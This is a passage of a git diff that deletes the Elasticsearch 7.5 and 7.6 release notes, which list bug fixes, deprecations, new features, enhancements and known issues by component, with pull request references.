{es-issue}47664[#47664]) -* Handle partial failure retrieving segments in SegmentCountStep {es-pull}46556[#46556] -* Fixes for API specification {es-pull}46522[#46522] - -Features/Indices APIs:: -* Fix Rollover error when alias has closed indices {es-pull}47148[#47148] (issue: {es-issue}47146[#47146]) - -Features/Ingest:: -* Do not wrap ingest processor exception with IAE {es-pull}48816[#48816] (issue: {es-issue}48810[#48810]) -* Introduce dedicated ingest processor exception {es-pull}48810[#48810] (issue: {es-issue}48803[#48803]) -* Allow dropping documents with 
auto-generated ID {es-pull}46773[#46773] (issue: {es-issue}46678[#46678]) -* Expose cache setting in UserAgentPlugin {es-pull}46533[#46533] - -Features/Java High Level REST Client:: -* fix incorrect comparison {es-pull}48208[#48208] -* Fix ILM HLRC Javadoc->Documentation links {es-pull}48083[#48083] -* Change HLRC count request to accept a QueryBuilder {es-pull}46904[#46904] (issue: {es-issue}46829[#46829]) -* [HLRC] Send min_score as query string parameter to the count API {es-pull}46829[#46829] (issue: {es-issue}46474[#46474]) -* HLRC multisearchTemplate forgot params {es-pull}46492[#46492] (issue: {es-issue}46488[#46488]) -* Added fields for MultiTermVectors (#42232) {es-pull}42877[#42877] (issue: {es-issue}42232[#42232]) - -Features/Java Low Level REST Client:: -* Update http-core and http-client dependencies {es-pull}46549[#46549] (issues: {es-issue}45379[#45379], {es-issue}45577[#45577], {es-issue}45808[#45808]) - -Features/Monitoring:: -* [Monitoring] Add new cluster privilege now necessary for the stack monitoring ui {es-pull}47871[#47871] -* Validating monitoring hosts setting while parsing {es-pull}47246[#47246] (issue: {es-issue}47125[#47125]) - -Features/Watcher:: -* Fix class used to initialize logger in Watcher {es-pull}46467[#46467] -* Fix wrong URL encoding in watcher HTTP client {es-pull}45894[#45894] (issue: {es-issue}44970[#44970]) -* Prevent deadlock by using separate schedulers {es-pull}48697[#48697] (issues: {es-issue}41451[#41451], {es-issue}47599[#47599]) -* Fix cluster alert for watcher/monitoring IndexOutOfBoundsExcep… {es-pull}45308[#45308] (issue: {es-issue}43184[#43184]) - -Geo:: -* Geo: implement proper handling of out of bounds geo points {es-pull}47734[#47734] (issue: {es-issue}43916[#43916]) -* Geo: Fixes indexing of linestrings that go around the globe {es-pull}47471[#47471] (issues: {es-issue}43826[#43826], {es-issue}43837[#43837]) -* Provide better error when updating geo_shape field mapper settings {es-pull}47281[#47281] (issue: {es-issue}47006[#47006]) -* Geo: fix indexing of west to east linestrings crossing the antimeridian {es-pull}46601[#46601] (issue: {es-issue}43775[#43775]) -* Reset queryGeometry in ShapeQueryTests {es-pull}45974[#45974] (issue: {es-issue}45628[#45628]) - -Highlighting:: -* Fix highlighting of overlapping terms in the unified highlighter {es-pull}47227[#47227] -* Fix highlighting for script_score query {es-pull}46507[#46507] (issue: {es-issue}46471[#46471]) - -Infra/Core:: -* Don't drop user's MaxDirectMemorySize flag on jdk8/windows {es-pull}48657[#48657] (issues: {es-issue}44174[#44174], {es-issue}48365[#48365]) -* Warn when MaxDirectMemorySize may be incorrect (Windows/JDK8 only issue) {es-pull}48365[#48365] (issue: {es-issue}47384[#47384]) -* Support optional parsers in any order with DateMathParser and roundup {es-pull}46654[#46654] (issue: {es-issue}45284[#45284]) - -Infra/Logging:: -* SearchSlowLog uses a non thread-safe object to escape json {es-pull}48363[#48363] (issues: {es-issue}44642[#44642], {es-issue}48358[#48358]) - -Infra/Scripting:: -* Drop stored scripts with the old style-id {es-pull}48078[#48078] (issue: {es-issue}47593[#47593]) - -Machine Learning:: -* [ML] Fixes for stop datafeed edge cases {es-pull}49191[#49191] (issues: {es-issue}43670[#43670], {es-issue}48931[#48931]) -* [ML] Avoid NPE when node load is calculated on job assignment {es-pull}49186[#49186] (issue: {es-issue}49150[#49150]) -* Do not throw exceptions resulting from persisting datafeed timing stats. 
{es-pull}49044[#49044] (issue: {es-issue}49032[#49032]) -* [ML] Deduplicate multi-fields for data frame analytics {es-pull}48799[#48799] (issues: {es-issue}48756[#48756], {es-issue}48770[#48770]) -* [ML] Prevent fetching multi-field from source {es-pull}48770[#48770] (issue: {es-issue}48756[#48756]) -* [ML] Fix detection of syslog-like timestamp in find_file_structure {es-pull}47970[#47970] -* Fix serialization of evaluation response. {es-pull}47557[#47557] -* [ML] Reinstate ML daily maintenance actions {es-pull}47103[#47103] (issue: {es-issue}47003[#47003]) -* [ML] fix two datafeed flush lockup bugs {es-pull}46982[#46982] - -Network:: -* Fix es.http.cname_in_publish_address Deprecation Logging {es-pull}47451[#47451] (issue: {es-issue}47436[#47436]) - -Recovery:: -* Ignore Lucene index in peer recovery if translog corrupted {es-pull}49114[#49114] - -Reindex:: -* Fix issues with serializing BulkByScrollResponse {es-pull}45357[#45357] - -SQL:: -* SQL: Fix issue with mins & hours for DATEDIFF {es-pull}49252[#49252] -* SQL: Fix issue with negative literals and parentheses {es-pull}48113[#48113] (issue: {es-issue}48009[#48009]) -* SQL: add "format" for "full" date range queries {es-pull}48073[#48073] (issue: {es-issue}48033[#48033]) -* SQL: Fix arg verification for DateAddProcessor {es-pull}48041[#48041] -* SQL: Fix Nullability of DATEADD {es-pull}47921[#47921] -* SQL: Allow whitespaces in escape patterns {es-pull}47577[#47577] (issue: {es-issue}47401[#47401]) -* SQL: fix multi full-text functions usage with aggregate functions {es-pull}47444[#47444] (issue: {es-issue}47365[#47365]) -* SQL: Check case where the pivot limit is reached {es-pull}47121[#47121] (issue: {es-issue}47002[#47002]) -* SQL: Properly handle indices with no/empty mapping {es-pull}46775[#46775] (issue: {es-issue}46757[#46757]) -* SQL: improve ResultSet behavior when no rows are available {es-pull}46753[#46753] (issue: {es-issue}46750[#46750]) -* SQL: use the correct data type for types conversion {es-pull}46574[#46574] (issue: {es-issue}46090[#46090]) -* SQL: Fix issue with common type resolution {es-pull}46565[#46565] (issue: {es-issue}46551[#46551]) -* SQL: fix scripting for grouped by datetime functions {es-pull}46421[#46421] (issue: {es-issue}40241[#40241]) -* SQL: Use null schema response {es-pull}46386[#46386] (issue: {es-issue}46381[#46381]) -* SQL: Fix issue with IIF function when condition folds {es-pull}46290[#46290] (issue: {es-issue}46268[#46268]) -* SQL: Fix issue with DataType for CASE with NULL {es-pull}46173[#46173] (issue: {es-issue}46032[#46032]) -* SQL: Failing Group By queries due to different ExpressionIds {es-pull}43072[#43072] (issues: {es-issue}33361[#33361], {es-issue}34543[#34543], {es-issue}36074[#36074], {es-issue}37044[#37044], {es-issue}40001[#40001], {es-issue}40240[#40240], {es-issue}41159[#41159], {es-issue}42041[#42041], {es-issue}46316[#46316]) -* SQL: wrong number of values for columns {es-pull}42122[#42122] - -Search:: -* Lucene#asSequentialBits gets the leadCost backwards.
{es-pull}48335[#48335] -* Ensure that we don't call listener twice when detecting a partial failures in _search {es-pull}47694[#47694] -* Fix alias field resolution in match query {es-pull}47369[#47369] -* Multi-get requests should wait for search active {es-pull}46283[#46283] (issue: {es-issue}27500[#27500]) -* Resolve the incorrect scroll_current when delete or close index {es-pull}45226[#45226] -* Don't apply the plugin's reader wrapper in can_match phase {es-pull}47816[#47816] (issue: {es-issue}46817[#46817]) - -Security:: -* Remove uniqueness constraint for API key name and make it optional {es-pull}47549[#47549] (issue: {es-issue}46646[#46646]) -* Initialize document subset bit set cache used for DLS {es-pull}46211[#46211] (issue: {es-issue}45147[#45147]) - -Snapshot/Restore:: -* Fix RepoCleanup not Removed on Master-Failover {es-pull}49217[#49217] -* Make FsBlobContainer Listing Resilient to Concurrent Modifications {es-pull}49142[#49142] (issue: {es-issue}37581[#37581]) -* Fix SnapshotShardStatus Reporting for Failed Shard {es-pull}48556[#48556] (issue: {es-issue}48526[#48526]) -* Cleanup Concurrent RepositoryData Loading {es-pull}48329[#48329] (issue: {es-issue}48122[#48122]) -* Fix Bug in Azure Repo Exception Handling {es-pull}47968[#47968] -* Make loadShardSnapshot Exceptions Consistent {es-pull}47728[#47728] (issue: {es-issue}47507[#47507]) -* Fix Snapshot Corruption in Edge Case {es-pull}47552[#47552] (issues: {es-issue}46250[#46250], {es-issue}47550[#47550]) -* Fix Bug in Snapshot Status Response Timestamps {es-pull}46919[#46919] (issue: {es-issue}46913[#46913]) -* Normalize Blob Store Repo Paths {es-pull}46869[#46869] (issue: {es-issue}41814[#41814]) -* GCS deleteBlobsIgnoringIfNotExists should catch StorageException {es-pull}46832[#46832] (issue: {es-issue}46772[#46772]) -* Execute SnapshotsService Error Callback on Generic Thread {es-pull}46277[#46277] -* Make Snapshot Logic Write Metadata after Segments {es-pull}45689[#45689] (issue: {es-issue}41581[#41581]) - -Store:: -* Allow truncation of clean translog {es-pull}47866[#47866] - -Task Management:: -* Fix .tasks index strict mapping: parent_id should be parent_task_id {es-pull}48393[#48393] - -Transform:: -* [Transform] do not fail checkpoint creation due to global checkpoint mismatch {es-pull}48423[#48423] (issue: {es-issue}48379[#48379]) -* [7.5][Transform] prevent assignment if any node is older than 7.4 {es-pull}48055[#48055] (issue: {es-issue}48019[#48019]) -* [Transform] prevent assignment to nodes older than 7.4 {es-pull}48044[#48044] (issue: {es-issue}48019[#48019]) -* [ML][Transforms] fix bwc serialization with 7.3 {es-pull}48021[#48021] -* [ML][Transforms] signal listener early on task _stop failure {es-pull}47954[#47954] -* [ML][Transform] Use field_caps API for mapping deduction {es-pull}46703[#46703] (issue: {es-issue}46694[#46694]) -* [ML-DataFrame] Fix off-by-one error in checkpoint operations_behind {es-pull}46235[#46235] - - - -[[regression-7.5.0]] -[discrete] -=== Regressions - -Aggregations:: -* Implement rounding optimization for fixed offset timezones {es-pull}46670[#46670] (issue: {es-issue}45702[#45702]) - -Infra/Core:: -* [Java.time] Support partial parsing {es-pull}46814[#46814] (issues: {es-issue}45284[#45284], {es-issue}47473[#47473]) -* Enable ResolverStyle.STRICT for java formatters {es-pull}46675[#46675] - - - -[[upgrade-7.5.0]] -[discrete] -=== Upgrades - -Infra/Scripting:: -* Update mustache dependency to 0.9.6 {es-pull}46243[#46243] - -Snapshot/Restore:: -* Update AWS SDK for 
repository-s3 plugin to support IAM Roles for Service Accounts {es-pull}46969[#46969] -* Upgrade to Azure SDK 8.4.0 {es-pull}46094[#46094] - -Store:: -* Upgrade to Lucene 8.3. {es-pull}48829[#48829] diff --git a/docs/reference/release-notes/7.6.asciidoc b/docs/reference/release-notes/7.6.asciidoc deleted file mode 100644 index bc05e6d81d0..00000000000 --- a/docs/reference/release-notes/7.6.asciidoc +++ /dev/null @@ -1,742 +0,0 @@ -[[release-notes-7.6.2]] -== {es} version 7.6.2 - -Also see <>. - -[[breaking-7.6.2]] -[discrete] -=== Breaking changes - -Authorization:: -* Creation of derived API keys (keys created by existing keys) now requires explicit "no privileges" configuration {es-pull}53647[#53647], https://www.elastic.co/community/security[CVE-2020-7009] - -[[bug-7.6.2]] -[discrete] -=== Bug fixes - -Allocation:: -* Improve performance of shards limits decider {es-pull}53577[#53577] (issue: {es-issue}53559[#53559]) - -Authentication:: -* Fix potential bug in concurrent token refresh support {es-pull}53668[#53668] - -CCR:: -* Handle no such remote cluster exception in ccr {es-pull}53415[#53415] (issue: {es-issue}53225[#53225]) - -Distributed:: -* Execute retention lease syncs under system context {es-pull}53838[#53838] (issues: {es-issue}48430[#48430], {es-issue}53751[#53751]) - -Engine:: -* Fix doc_stats and segment_stats of ReadOnlyEngine {es-pull}53345[#53345] (issues: {es-issue}51303[#51303], {es-issue}51331[#51331]) - -Features/ILM+SLM:: -* Fix null config in SnapshotLifecyclePolicy.toRequest {es-pull}53328[#53328] (issues: {es-issue}44465[#44465], {es-issue}53171[#53171]) -* ILM Freeze step retry when not acknowledged {es-pull}53287[#53287] - -Features/Ingest:: -* Fix ingest pipeline _simulate api with empty docs never returns a res… {es-pull}52937[#52937] (issue: {es-issue}52833[#52833]) - -Features/Java High Level REST Client:: -* Add unsupported parameters to HLRC search request {es-pull}53745[#53745] -* Fix AbstractBulkByScrollRequest slices parameter via Rest {es-pull}53068[#53068] (issue: {es-issue}53044[#53044]) - -Features/Watcher:: -* Disable Watcher script optimization for stored scripts {es-pull}53497[#53497] (issue: {es-issue}40212[#40212]) - -Infra/Core:: -* Avoid self-suppression on grouped action listener {es-pull}53262[#53262] (issue: {es-issue}53174[#53174]) - -Infra/Packaging:: -* Handle special characters and spaces in JAVA_HOME path in elasticsearch-service.bat {es-pull}52676[#52676] - -Infra/Plugins:: -* Ensure only plugin REST tests are run for plugins {es-pull}53184[#53184] (issues: {es-issue}52114[#52114], {es-issue}53183[#53183]) - -Machine Learning:: -* Fix a bug in the calculation of the minimum loss leaf values for classification {ml-pull}1032[#1032] - -Network:: -* Invoke response handler on failure to send {es-pull}53631[#53631] - -SQL:: -* Fix NPE for parameterized LIKE/RLIKE {es-pull}53573[#53573] (issue: {es-issue}53557[#53557]) -* Add support for index aliases for SYS COLUMNS command {es-pull}53525[#53525] (issue: {es-issue}31609[#31609]) -* Fix issue with LIKE/RLIKE as painless script {es-pull}53495[#53495] (issue: {es-issue}53486[#53486]) -* Fix column size for IP data type {es-pull}53056[#53056] (issue: {es-issue}52762[#52762]) - -Search:: -* Fix Term Vectors with artificial docs and keyword fields {es-pull}53504[#53504] (issue: {es-issue}53494[#53494]) -* Fix concurrent requests race over scroll context limit {es-pull}53449[#53449] -* Fix pre-sorting of shards in the can_match phase {es-pull}53397[#53397] -* Fix potential NPE in 
FuzzyTermsEnum {es-pull}53231[#53231] (issue: {es-issue}52894[#52894]) - -[[upgrade-7.6.2]] -[discrete] -=== Upgrades - -Infra/Core:: -* Update jackson-databind to 2.8.11.6 {es-pull}53522[#53522] (issue: {es-issue}45225[#45225]) - -[[release-notes-7.6.1]] -== {es} version 7.6.1 - -Also see <>. - -[[bug-7.6.1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Decode max and min optimization more carefully {es-pull}52336[#52336] (issue: {es-issue}52220[#52220]) -* Fix a DST error in date_histogram {es-pull}52016[#52016] (issue: {es-issue}50265[#50265]) - -Audit:: -* Logfile audit settings validation {es-pull}52537[#52537] (issues: {es-issue}47038[#47038], {es-issue}47711[#47711], {es-issue}52357[#52357]) - -CCR:: -* Fix shard follow task cleaner under security {es-pull}52347[#52347] (issues: {es-issue}44702[#44702], {es-issue}51971[#51971]) - -Features/cat APIs:: -* Fix NPE in RestPluginsAction {es-pull}52620[#52620] (issue: {es-issue}45321[#45321]) - -Features/ILM+SLM:: -* ILM fix the init step to actually be retryable {es-pull}52076[#52076] - -Features/Ingest:: -* Handle errors when evaluating if conditions in processors {es-pull}52543[#52543] (issue: {es-issue}52339[#52339]) - -Features/Monitoring:: -* Fix NPE in cluster state collector for monitoring {es-pull}52371[#52371] (issue: {es-issue}52317[#52317]) - -Features/Stats:: -* Switch to AtomicLong for "IngestCurrent" metric to prevent negative values {es-pull}52581[#52581] (issues: {es-issue}52406[#52406], {es-issue}52411[#52411]) - -Infra/Packaging:: -* Limit _FILE env var support to specific vars {es-pull}52525[#52525] (issue: {es-issue}52503[#52503]) - -Machine Learning:: -* Don't return inflated definition when storing trained models {es-pull}52573[#52573] -* Validate tree feature index is within range {es-pull}52460[#52460] - -Network:: -* Remove seeds dependency for remote cluster settings {es-pull}52796[#52796] - -Reindex:: -* Allow comma separated source indices {es-pull}52044[#52044] (issue: {es-issue}51949[#51949]) - -SQL:: -* Supplement input checks on received request parameters {es-pull}52229[#52229] -* Fix issue with timezone when paginating {es-pull}52101[#52101] (issue: {es-issue}51258[#51258]) -* Fix ORDER BY on aggregates and GROUPed BY fields {es-pull}51894[#51894] (issue: {es-issue}50355[#50355]) -* Fix milliseconds handling in intervals {es-pull}51675[#51675] (issue: {es-issue}41635[#41635]) -* Selecting a literal from grouped by query generates error {es-pull}41964[#41964] (issues: {es-issue}41413[#41413], {es-issue}41951[#41951]) - -Snapshot/Restore:: -* Fix Non-Verbose Snapshot List Missing Empty Snapshots {es-pull}52433[#52433] - -Store:: -* Fix synchronization in ByteSizeCachingDirectory {es-pull}52512[#52512] - - - -[[upgrade-7.6.1]] -[discrete] -=== Upgrades - -Authentication:: -* Update oauth2-oidc-sdk to 7.0 {es-pull}52489[#52489] (issue: {es-issue}48409[#48409]) - -[[release-notes-7.6.0]] -== {es} version 7.6.0 - -Also see <>. - -[[known-issues-7.6.0]] -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likelihood of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions.
More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -This is fixed in {es} 7.7 and later versions ({es-pull}52555[#52555]). - -* Slow loggers can cause Log4j loggers to leak over time. When a new index is created, - a new Log4j logger is associated with it. However, when an index is deleted, - Log4j keeps an internal reference to its loggers that results in a memory leak (issue: {es-issue}56171[#56171]) -+ -This issue is fixed in {es} 6.8.10 and 7.7.1. - -* Week-based date patterns are not working correctly with `Y`. Using `Y` with `w` will result in -a failed request and an exception in the logs (issue: {es-issue}57128[#57128]). Using `y` with `w` results in -incorrect date calculations. A workaround is to add the following line to the `jvm.options` file. -+ -[source,shell] --------------------------------------------- -9-:-Djava.locale.providers=SPI,COMPAT --------------------------------------------- -+ -This issue is fixed in {es} 7.7.0 and later versions (issue: {es-issue}50916[#50916]). - -[[breaking-7.6.0]] -[discrete] -=== Breaking changes - -[[breaking-java-7.6.0]] -[discrete] -=== Breaking Java changes - -Security:: -* Support Client and RoleMapping in custom Realms {es-pull}50534[#50534] (issue: {es-issue}48369[#48369]) - - - -[[deprecation-7.6.0]] -[discrete] -=== Deprecations - -Analysis:: -* Deprecate and remove camel-case nGram and edgeNGram tokenizers {es-pull}50862[#50862] (issue: {es-issue}50561[#50561]) - -Authorization:: -* Deprecating kibana_user and kibana_dashboard_only_user roles {es-pull}46456[#46456] - -Distributed:: -* Deprecate synced flush {es-pull}50835[#50835] (issue: {es-issue}50776[#50776]) -* Deprecate indices without soft-deletes {es-pull}50502[#50502] - -Features/Indices APIs:: -* Emit warnings when index templates have multiple mappings {es-pull}50982[#50982] -* Ensure we emit a warning when using the deprecated 'template' field. {es-pull}50831[#50831] (issue: {es-issue}49460[#49460]) - -Infra/Core:: -* Deprecate the 'local' parameter of /_cat/nodes {es-pull}50499[#50499] (issue: {es-issue}50088[#50088]) - -Reindex:: -* Deprecate sorting in reindex {es-pull}49458[#49458] (issue: {es-issue}47567[#47567]) - -Search:: -* Deprecate loading fielddata on _id field {es-pull}49166[#49166] (issues: {es-issue}26472[#26472], {es-issue}43599[#43599]) -* Update the signature of vector script functions. {es-pull}48604[#48604] -* Deprecate the sparse_vector field type. {es-pull}48315[#48315] -* Add a deprecation warning regarding allocation awareness in search request {es-pull}48351[#48351] (issue: {es-issue}43453[#43453]) - - -[[feature-7.6.0]] -[discrete] -=== New features - -Aggregations:: -* New Histogram field mapper that supports percentiles aggregations.
{es-pull}48580[#48580] (issue: {es-issue}48578[#48578]) -* Implement stats aggregation for string terms {es-pull}47468[#47468] - -Analysis:: -* Implement Lucene EstonianAnalyzer, Stemmer {es-pull}49149[#49149] (issue: {es-issue}48895[#48895]) - -Authentication:: -* Password Protected Keystore (Feature Branch) {es-pull}49210[#49210] - -Features/ILM+SLM:: -* ILM action to wait for SLM policy execution {es-pull}50454[#50454] (issue: {es-issue}45067[#45067]) -* Add ILM history store index {es-pull}50287[#50287] (issue: {es-issue}49180[#49180]) - -Features/Ingest:: -* CSV processor {es-pull}49509[#49509] (issue: {es-issue}49113[#49113]) - -Machine Learning:: -* Implement `precision` and `recall` metrics for classification evaluation {es-pull}49671[#49671] (issue: {es-issue}48759[#48759]) -* Explain data frame analytics API {es-pull}49455[#49455] -* Machine learning model inference ingest processor {es-pull}49052[#49052] -* Implement accuracy metric for multi-class classification {es-pull}47772[#47772] (issue: {es-issue}48759[#48759]) -* Add feature importance values to classification and regression results (using tree -SHapley Additive exPlanation, or SHAP) {ml-pull}857[#857] - -Mapping:: -* Add per-field metadata. {es-pull}49419[#49419] (issue: {es-issue}33267[#33267]) - -Search:: -* Add fuzzy intervals source {es-pull}49762[#49762] (issue: {es-issue}49595[#49595]) -* Add a listener to track the progress of a search request locally {es-pull}49471[#49471] (issue: {es-issue}49091[#49091]) - - - -[[enhancement-7.6.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Add reusable HistogramValue object {es-pull}49799[#49799] (issue: {es-issue}49683[#49683]) -* Optimize composite aggregation based on index sorting {es-pull}48399[#48399] (issue: {es-issue}48130[#48130]) - -Allocation:: -* Auto-expand indices according to allocation filtering rules {es-pull}48974[#48974] -* Do not cancel ongoing recovery for noop copy on broken node {es-pull}48265[#48265] (issue: {es-issue}47974[#47974]) -* Quieter logging from the DiskThresholdMonitor {es-pull}48115[#48115] (issue: {es-issue}48038[#48038]) -* Faster access to INITIALIZING/RELOCATING shards {es-pull}47817[#47817] (issues: {es-issue}46941[#46941], {es-issue}48579[#48579]) - -Analysis:: -* Check for deprecations when analyzers are built {es-pull}50908[#50908] (issue: {es-issue}42349[#42349]) -* Make Multiplexer inherit filter chains analysis mode {es-pull}50662[#50662] (issue: {es-issue}50554[#50554]) -* Allow custom characters in token_chars of ngram tokenizers {es-pull}49250[#49250] (issue: {es-issue}25894[#25894]) - -Authentication:: -* Add Debug/Trace logging for authentication {es-pull}49575[#49575] (issue: {es-issue}49473[#49473]) - -Authorization:: -* Increase Size and lower TTL on DLS BitSet Cache {es-pull}50535[#50535] (issues: {es-issue}43669[#43669], {es-issue}49260[#49260]) -* Add 'monitor_snapshot' cluster privilege {es-pull}50489[#50489] (issue: {es-issue}50210[#50210]) -* Remove reserved roles for code search {es-pull}50068[#50068] (issue: {es-issue}49842[#49842]) -* [Code] Remove code_admin/code_user roles {es-pull}48164[#48164] -* Resolve the role query and the number of docs lazily {es-pull}48036[#48036] - -CCR:: -* Improve error message when pausing index {es-pull}48915[#48915] -* Use MultiFileTransfer in CCR remote recovery {es-pull}44514[#44514] (issue: {es-issue}44468[#44468]) - -CRUD:: -* print id detail when id is too long.
{es-pull}49433[#49433] -* Add preflight check to dynamic mapping updates {es-pull}48817[#48817] (issue: {es-issue}35564[#35564]) - -Cluster Coordination:: -* Move metadata storage to Lucene {es-pull}50907[#50907] (issue: {es-issue}48701[#48701]) -* Remove custom metadata tool {es-pull}50813[#50813] (issue: {es-issue}48701[#48701]) - -Distributed:: -* Use retention lease in peer recovery of closed indices {es-pull}48430[#48430] (issue: {es-issue}45136[#45136]) - -Engine:: -* Do not force refresh when write indexing buffer {es-pull}50769[#50769] -* Deleted docs disregarded for if_seq_no check {es-pull}50526[#50526] -* Allow realtime get to read from translog {es-pull}48843[#48843] -* Do not warm up searcher in engine constructor {es-pull}48605[#48605] (issue: {es-issue}47186[#47186]) -* Add a new merge policy that interleaves old and new segments on force merge {es-pull}48533[#48533] (issue: {es-issue}37043[#37043]) -* Refresh should not acquire readLock {es-pull}48414[#48414] (issue: {es-issue}47186[#47186]) - -Features/ILM+SLM:: -* Refresh cached phase policy definition if possible on new poli… {es-pull}50820[#50820] (issue: {es-issue}48431[#48431]) -* Make the UpdateRolloverLifecycleDateStep retryable {es-pull}50702[#50702] (issue: {es-issue}48183[#48183]) -* Make InitializePolicyContextStep retryable {es-pull}50685[#50685] (issue: {es-issue}48183[#48183]) -* ILM retryable async action steps {es-pull}50522[#50522] (issues: {es-issue}44135[#44135], {es-issue}48183[#48183]) -* Make the TransportRolloverAction execute in one cluster state update {es-pull}50388[#50388] -* ILM open/close steps are noop if idx is open/close {es-pull}48614[#48614] -* ILM Make the `check-rollover-ready` step retryable {es-pull}48256[#48256] (issue: {es-issue}44135[#44135]) - -Features/Ingest:: -* Foreach processor - fork recursive call {es-pull}50514[#50514] -* Sync grok patterns with logstash patterns {es-pull}50381[#50381] -* Replace required pipeline with final pipeline {es-pull}49470[#49470] (issue: {es-issue}49247[#49247]) -* Add templating support to enrich processor {es-pull}49093[#49093] -* Introduce on_failure_pipeline ingest metadata inside on_failure block {es-pull}49076[#49076] (issue: {es-issue}44920[#44920]) -* Add templating support to pipeline processor. {es-pull}49030[#49030] (issue: {es-issue}39955[#39955]) -* Add option to split processor for preserving trailing empty fields {es-pull}48664[#48664] (issue: {es-issue}48498[#48498]) -* Change grok watch dog to be Matcher based instead of thread based. 
{es-pull}48346[#48346] (issues: {es-issue}43673[#43673], {es-issue}47374[#47374]) -* update ingest-user-agent regexes.yml {es-pull}47807[#47807] - -Features/Java High Level REST Client:: -* Add remote info to the HLRC {es-pull}49657[#49657] (issue: {es-issue}47678[#47678]) -* Add delete alias to the HLRC {es-pull}48819[#48819] (issue: {es-issue}47678[#47678]) - -Features/Monitoring:: -* Significantly Lower Monitoring HttpExport Memory Footprint {es-pull}48854[#48854] -* Validate proxy base path at parse time {es-pull}47912[#47912] (issue: {es-issue}47711[#47711]) -* Validate index name time format setting at parse time {es-pull}47911[#47911] (issue: {es-issue}47711[#47711]) -* Validate monitoring header overrides at parse time {es-pull}47848[#47848] (issue: {es-issue}47711[#47711]) -* Validate monitoring username at parse time {es-pull}47821[#47821] (issue: {es-issue}47711[#47711]) -* Validate monitoring password at parse time {es-pull}47740[#47740] (issue: {es-issue}47711[#47711]) - -Features/Stats:: -* Add ingest info to Cluster Stats {es-pull}48485[#48485] (issue: {es-issue}46146[#46146]) - -Features/Watcher:: -* Log attachment generation failures {es-pull}50080[#50080] -* Don't dump a stacktrace for invalid patterns when executing elasticse… {es-pull}49744[#49744] (issue: {es-issue}49642[#49642]) - -Geo:: -* "CONTAINS" support for BKD-backed geo_shape and shape fields {es-pull}50141[#50141] (issue: {es-issue}41204[#41204]) -* Adds support for geo-bounds filtering in geogrid aggregations {es-pull}50002[#50002] -* Introduce faster approximate sinh/atan math functions {es-pull}49009[#49009] (issue: {es-issue}41166[#41166]) -* Add IndexOrDocValuesQuery to GeoPolygonQueryBuilder {es-pull}48449[#48449] - -Infra/Core:: -* Add "did you mean" to ObjectParser {es-pull}50938[#50938] -* Consistent case in CLI option descriptions {es-pull}49635[#49635] -* Improve resiliency to formatting JSON in server {es-pull}48553[#48553] (issue: {es-issue}48450[#48450]) -* Don't close stderr under `--quiet` {es-pull}47208[#47208] (issue: {es-issue}46900[#46900]) - -Infra/Packaging:: -* Respect ES_PATH_CONF on package install {es-pull}50158[#50158] -* Restrict support for CMS to pre-JDK 14 {es-pull}49123[#49123] (issue: {es-issue}46973[#46973]) -* Remove parsed JVM settings from general settings in Windows service daemon manager {es-pull}49061[#49061] (issue: {es-issue}48796[#48796]) -* Package the JDK into jdk.app on macOS {es-pull}48765[#48765] -* Add UBI-based Docker images {es-pull}48710[#48710] (issue: {es-issue}48429[#48429]) - -Infra/Plugins:: -* Report progress of multiple plugin installs {es-pull}51001[#51001] (issue: {es-issue}50924[#50924]) -* Allow installing multiple plugins as a transaction {es-pull}50924[#50924] (issue: {es-issue}50443[#50443]) - -Infra/Scripting:: -* Scripting: ScriptFactory not required by compile {es-pull}50344[#50344] (issue: {es-issue}49466[#49466]) -* Scripting: Cache script results if deterministic {es-pull}50106[#50106] (issue: {es-issue}49466[#49466]) -* Scripting: Groundwork for caching script results {es-pull}49895[#49895] (issue: {es-issue}49466[#49466]) -* Scripting: add available languages & contexts API {es-pull}49652[#49652] (issue: {es-issue}49463[#49463]) -* Scripting: fill in get contexts REST API {es-pull}48319[#48319] (issue: {es-issue}47411[#47411]) -* Scripting: get context names REST API {es-pull}48026[#48026] (issue: {es-issue}47411[#47411]) - -Infra/Settings:: -* Add parameter to make sure that log of updating IndexSetting be more detailed 
{es-pull}49969[#49969] (issue: {es-issue}49818[#49818]) -* Enable dependent settings values to be validated {es-pull}49942[#49942] -* Do not reference values for filtered settings {es-pull}48066[#48066] - -License:: -* Add max_resource_units to enterprise license {es-pull}50735[#50735] -* Add setting to restrict license types {es-pull}49418[#49418] (issue: {es-issue}48508[#48508]) -* Support "enterprise" license types {es-pull}49223[#49223] (issue: {es-issue}48510[#48510]) - -Machine Learning:: -* Add audit warning for 1000 categories found early in job {es-pull}51146[#51146] (issue: {es-issue}50749[#50749]) -* Add `num_top_feature_importance_values` param to regression and classification {es-pull}50914[#50914] -* Implement force deleting a data frame analytics job {es-pull}50553[#50553] (issue: {es-issue}48124[#48124]) -* Delete unused data frame analytics state {es-pull}50243[#50243] -* Make each analysis report desired field mappings to be copied {es-pull}50219[#50219] (issue: {es-issue}50119[#50119]) -* Retry bulk indexing of state docs {es-pull}50149[#50149] (issue: {es-issue}50143[#50143]) -* Persist/restore state for data frame analytics classification {es-pull}50040[#50040] -* Introduce `randomize_seed` setting for regression and classification {es-pull}49990[#49990] -* Pass `prediction_field_type` to C++ analytics process {es-pull}49861[#49861] (issue: {es-issue}49796[#49796]) -* Add optional source filtering during data frame reindexing {es-pull}49690[#49690] (issue: {es-issue}49531[#49531]) -* Add default categorization analyzer definition to ML info {es-pull}49545[#49545] -* Add graceful retry for anomaly detector result indexing failures {es-pull}49508[#49508] (issue: {es-issue}45711[#45711]) -* Lower minimum model memory limit value for data frame analytics jobs from 1MB to 1kB {es-pull}49227[#49227] (issue: {es-issue}49168[#49168]) -* Improve `model_memory_limit` user experience for data frame analytics jobs {es-pull}44699[#44699] -* Improve performance of boosted tree training for both classification and regression {ml-pull}775[#775] -* Reduce the peak memory used by boosted tree training and fix an overcounting bug -estimating maximum memory usage {ml-pull}781[#781] -* Stratified fractional cross validation for regression {ml-pull}784[#784] -* Added `geo_point` supported output for `lat_long` function records {ml-pull}809[#809], {es-pull}47050[#47050] -* Use a random bag of the data to compute the loss function 